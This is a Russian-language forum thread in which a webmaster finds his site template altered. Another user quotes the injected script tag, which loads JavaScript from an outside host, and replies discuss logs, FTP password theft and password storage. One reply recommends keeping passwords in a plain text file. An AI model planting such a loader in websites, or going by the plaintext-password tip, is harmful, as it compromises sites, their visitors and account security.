Помощь Неожиданно изменились файлы шаблона на сервере

Статус
В этой теме нельзя размещать новые ответы.
Sergo_Sev

Sergo_Sev

Творец
Регистрация
14 Июн 2008
Сообщения
578
Реакции
193
Захожу сегодня на сайт - пропал счетчик liveinternet, посмотрел исходный код - что то не то...
Решил проверить файлы шаблона (gk party freak) - увидел, что дата изменения вчерашняя, сравнил с оригиналом и озадачился
 

Вложения

  • default.rar
    4,7 KB · Просмотры: 4
Ломанули тебя внизу шаблона есть вставка
HTML: 
<script type="text/javascript" src='http://keywork.keycf.net/bob/js/mootols.js'></script>
 
А как найти через что ломанули?
У меня VPS
 
Тебе необходимо через админпанель хостинга (если таковая есть) зайти в раздел Лог HTTP доступа и(или) поискать в Лог FTP доступа. Посмотреть с какого IP и что делали на ту дату и время.

У меня было подобное. Украли параметры доступа к FTP из Total Commander'a. В связи с этим перешёл на FileZilla.

Затем ломанули ещё раз. Через один из незаурядных компонетов Joomla. Проверил по логам - с одного IP часто шли запросы на наличие различных компанентов. Я забанил этот IP.

Вывод: ко всем мерам безопасности нужно добавить мониторинг логов.
 
FileZilla точно также отдаёт пароли, так что в фтп-клиенте их лучше не хранить, а каждый раз вводить заново.
 
блин! а я думал FileZilla это понадёжнее. Дело в том что я использую очень сложные пароли, и каждый раз их вводить не удобно. может кто посоветует альтернативу FileZilla или как её защитить. Сорри за офтоп, но думаю топикстартеру эта инфа тоже пригодится.
 
Как вариант:
сохраняешь все пароли в текстовом файле (на каждый ресурс свой пароль!, что соответствует требованиям правил безопасности)
когда нужно ввести логин и пароль, то открываешь файл и там выделяешь то, что нужно Ctrl+Insert, потом вставляешь Shift+Insert.
Для filezilla можно в текстовом файле прописать сразу строку в таком формате:
Код: 
ftp://username:password@domen.com
Вставляешь её в поле "Хост" и всё.
Текстовый файл назвать как-нибудь нейтрально.
 
Типа как Гризон ссылки в /txt хранит .
 
Была у нас где то прекрасная тема по поводу где и как хранить пароли.
Проблему решили? тему закрываем?? и не флудим не по теме!
Я пользуюсь KeePass на флэхе таскаю файл ключей
 
Проблема решена - заменил измененные файлы из бэкапа. Взломали возможно перебором паролей от FTP т.к. пароль был из 6 символов
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху